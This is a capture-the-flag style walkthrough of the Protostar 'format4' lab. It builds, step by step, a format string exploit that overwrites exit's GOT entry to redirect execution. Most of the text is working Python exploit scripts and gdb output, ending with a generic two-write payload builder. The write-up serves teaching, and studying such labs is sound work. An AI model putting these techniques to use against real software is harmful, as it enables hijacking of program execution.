AAAABBBBCCCC200 b7fd8420 bffff614 41414141 42424242 43434343 25207825 78252078 20782520 25207825 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

So our input starts at the 4th argument position on the stack (the 4th value printed is 41414141). We can use the percent and dollar notation (%4$x) to reference this position directly in the format string.

import struct

HELLO = 0x80484b4
EXIT = 0x08049724

# Pad the input to 512 bytes, the size of the buffer
def padding(s):
    return s + ('X' * (512 - len(s)))

exploit = ""
exploit += struct.pack("I", EXIT)  # address of exit's GOT entry, now the 4th argument
exploit += "AAAABBBBCCCC"          # filler
exploit += "%4$x "
exploit += "%4$n"
print padding(exploit)

The %4$ means the 4th argument, which is where 0x41414141 was located and which now holds the address of exit's GOT entry. We will now see if we can overwrite the GOT.

Lets open the program in gdb and disassemble vuln:

(gdb) disassemble vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.

Now lets set breakpoints before and after printf so we can see if the GOT changes.

(gdb) b*0x08048503
Breakpoint 1 at 0x8048503: file format4/format4.c, line 20.
(gdb) b*0x08048508
Breakpoint 2 at 0x8048508: file format4/format4.c, line 22.

Now run and arrive at the first breakpoint:

(gdb) r
Breakpoint 1, 0x08048503 in vuln () at format4/format4.c:20
20 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483f2
(gdb) c
Continuing.
Breakpoint 2, vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x00000018

YESSSS!!! We have overwritten the GOT with a value. Now we have to get the right value. We are aiming for 0x80484b4, so about 134 million characters should do it. No biggie!!!

Typing that many characters by hand is out of the question, and our input is limited to 512 bytes anyway. We can take advantage of another printf feature, the field width: as we did in format 3, we can put a number before the "x" and the output is padded to that many characters.

But even with a field width, printing 134 million characters takes extremely long, so what we will do is split the write into 2 smaller writes:

Our address is 0x080484b4, so our first write will aim for the lower 2 bytes, which are 84b4, and our second write will aim for the upper 2 bytes, 0804:

The first write:

import struct

HELLO = 0x80484b4
EXIT = 0x08049724

# Pad the input to 512 bytes, the size of the buffer
def padding(s):
    return s + ('X' * (512 - len(s)))

exploit = ""
exploit += struct.pack("I", EXIT)  # address of exit's GOT entry, the 4th argument
exploit += "AAAABBBBCCCC"          # filler
exploit += "%4$30x "               # trial width of 30
exploit += "%4$n"
print padding(exploit)

Lets see first how much we overwrite, thus run it again and examine the GOT:

Breakpoint 1, 0x08048503 in vuln () at format4/format4.c:20
20 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483f2
(gdb) c
Continuing.
Breakpoint 2, vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x0000002f

Ok so with a width of 30 we got 0x2f, which is 47 in decimal, so 47 - 30 = 17 characters are printed besides the padded value. We are aiming for hex 84b4, which is 33972, so lets pad our x with 33972 - 17 = 33955.
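The same calculation as a Python 3 sketch, using only numbers from the gdb run above. The variable names are made up for this example.

```python
TRIAL_WIDTH = 30      # width used in the trial run
TRIAL_RESULT = 0x2f   # value gdb showed in the GOT entry afterwards
LOW_HALF = 0x84b4     # lower two bytes of hello's address

# Everything printed besides the padded value:
# 4 address bytes + 12 filler characters + 1 space
overhead = TRIAL_RESULT - TRIAL_WIDTH

# Width that makes the total count equal to the lower half
width = LOW_HALF - overhead

print(overhead, width)
```

Measuring the overhead with a trial run like this is convenient because it works even when you are not sure exactly which characters are printed in front of the padded value.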

import struct

HELLO = 0x80484b4
EXIT = 0x08049724

# Pad the input to 512 bytes, the size of the buffer
def padding(s):
    return s + ('X' * (512 - len(s)))

exploit = ""
exploit += struct.pack("I", EXIT)  # address of exit's GOT entry, the 4th argument
exploit += "AAAABBBBCCCC"          # filler
exploit += "%4$33955x "            # pads the count up to 0x84b4
exploit += "%4$n"
print padding(exploit)

Run:

Breakpoint 1, 0x08048503 in vuln () at format4/format4.c:20
20 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483f2
(gdb) c
Continuing.
$AAAABBBBCCCC
Breakpoint 2, vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x000084b4

Okay we have overwritten the lower half now lets go for the upper:

import struct

HELLO = 0x80484b4
EXIT = 0x08049724

# Pad the input to 512 bytes, the size of the buffer
def padding(s):
    return s + ('X' * (512 - len(s)))

exploit = ""
exploit += struct.pack("I", EXIT)      # 4th argument: lower half of the GOT entry
exploit += struct.pack("I", EXIT + 2)  # 5th argument: upper half of the GOT entry
exploit += "BBBBCCCC"                  # filler
exploit += "%4$33956x"  # the space after x is gone, so the width grows by 1
exploit += "%4$n"
exploit += "%5$30x"     # trial width for the second write
exploit += "%5$n"
print padding(exploit)

Remember that x86 is little-endian: the lower two bytes of the GOT entry are stored at EXIT and the upper two bytes at EXIT+2. By placing EXIT+2 right after EXIT in our input, we get a second pointer that lets us write the upper half separately. %5$ references the 5th argument, which is where EXIT+2 now sits, so the second %n writes there.

Run:

Breakpoint 1, 0x08048503 in vuln () at format4/format4.c:20
20 format4/format4.c: No such file or directory.
in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483f2
(gdb) c
Continuing.
$&BBBBCCCC
Breakpoint 2, vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x84d284b4

We have overwritten both halves successfully, but sadly the upper half is not the correct value yet. And we have already gone above the target!!! So how do we decrease our number when we can only add to our padding?!?!?

We overflow it so that the count becomes 0x10804. The two bytes written at EXIT+2 that land inside the GOT entry are then 0804, which gives 080484b4. The extra 1 spills into the bytes after the entry and is not part of the address that gets read. So we must go from 84d2 up to 1 0804. Lets put that in a hex calculator and check:

0x10804 - 0x84d2 = 0x8332, or 33586 in decimal, and adding the existing padding of 30 gives 33616.
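The wrap-around is just arithmetic modulo 0x10000, which a short Python 3 sketch makes explicit. All numbers come from the runs above, and the variable names are chosen for illustration.

```python
FIRST_COUNT = 0x84b4   # characters printed when the first %n fires
TRIAL_WIDTH = 30       # width of the second %x in the trial run
HIGH_HALF = 0x0804     # upper two bytes of hello's address

# What the second %n stored in the trial run
observed = FIRST_COUNT + TRIAL_WIDTH

# Characters still missing until the low 16 bits of the count read 0x0804.
# The modulo handles the fact that we have to go "around" past 0xffff.
missing = (HIGH_HALF - observed) % 0x10000

width = TRIAL_WIDTH + missing
final_count = FIRST_COUNT + width

print(hex(observed), hex(missing), width, hex(final_count))
```

The final count is 0x10804, and only its low 16 bits end up in the upper half of the GOT entry.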

import struct

HELLO = 0x80484b4
EXIT = 0x08049724

# Pad the input to 512 bytes, the size of the buffer
def padding(s):
    return s + ('X' * (512 - len(s)))

exploit = ""
exploit += struct.pack("I", EXIT)      # 4th argument: lower half of the GOT entry
exploit += struct.pack("I", EXIT + 2)  # 5th argument: upper half of the GOT entry
exploit += "BBBBCCCC"                  # filler
exploit += "%4$33956x"  # count is now 0x84b4
exploit += "%4$n"
exploit += "%5$33616x"  # count is now 0x10804
exploit += "%5$n"
print padding(exploit)

Run:

Breakpoint 1, 0x08048503 in vuln () at format4/format4.c:20
20 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483f2
(gdb) c
Continuing.
$&BBBBCCCC
Breakpoint 2, vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080484b4

Nice we have overwritten it!!! Lets continue to see what happens.

(gdb) c
Continuing.
9726XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXcode execution redirected! you win
Program exited with code 01

Nice lets execute it without gdb

user@protostar:/opt/protostar/bin$ python /tmp/exp.py | ./format4
$&BBBBCCCC
...
...
...
...
8049726XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXcode execution redirected! you win

Nice WE GOT it!!!!! We redirected code execution!!!
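For reuse, the whole calculation can be wrapped in one function. The following is a sketch in Python 3 rather than the Python 2 used on the VM, and build_payload with its parameters is a hypothetical helper, not part of any library. It assumes the same layout as the final script: two packed addresses, some filler, then two padded %x and %n pairs. The 'X' padding to 512 bytes is left out.

```python
import struct

def build_payload(got_entry, new_value, first_arg=4, filler=b"BBBBCCCC"):
    """Build a two-write format string that stores new_value at got_entry.

    first_arg is the argument index at which the start of our input
    appears on the stack (4 for format4, as found above).
    """
    low = new_value & 0xffff
    high = new_value >> 16

    # Two pointers: one for the lower half, one for the upper half
    prefix = struct.pack("<I", got_entry)
    prefix += struct.pack("<I", got_entry + 2)
    prefix += filler

    width_low = low - len(prefix)           # count reaches `low`
    width_high = (high - low) % 0x10000     # count wraps around to `high`

    # %x prints up to 8 hex digits regardless of the width, so smaller
    # widths would not give an exact character count.
    if width_low < 8 or width_high < 8:
        raise ValueError("value not reachable with this simple layout")

    fmt = "%{a}${w1}x%{a}$n%{b}${w2}x%{b}$n".format(
        a=first_arg, w1=width_low, b=first_arg + 1, w2=width_high)
    return prefix + fmt.encode("ascii")

payload = build_payload(0x08049724, 0x080484b4)
print(payload)
```

For the addresses in this level it reproduces the widths 33956 and 33616 that were found by hand. As a side note, printf also accepts %hn, which writes only two bytes and would avoid spilling into the neighbouring GOT entry. That variant was not tried here.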

I hope you loved it because next will be about HEAPS!!!!

— H3retic4l_Human
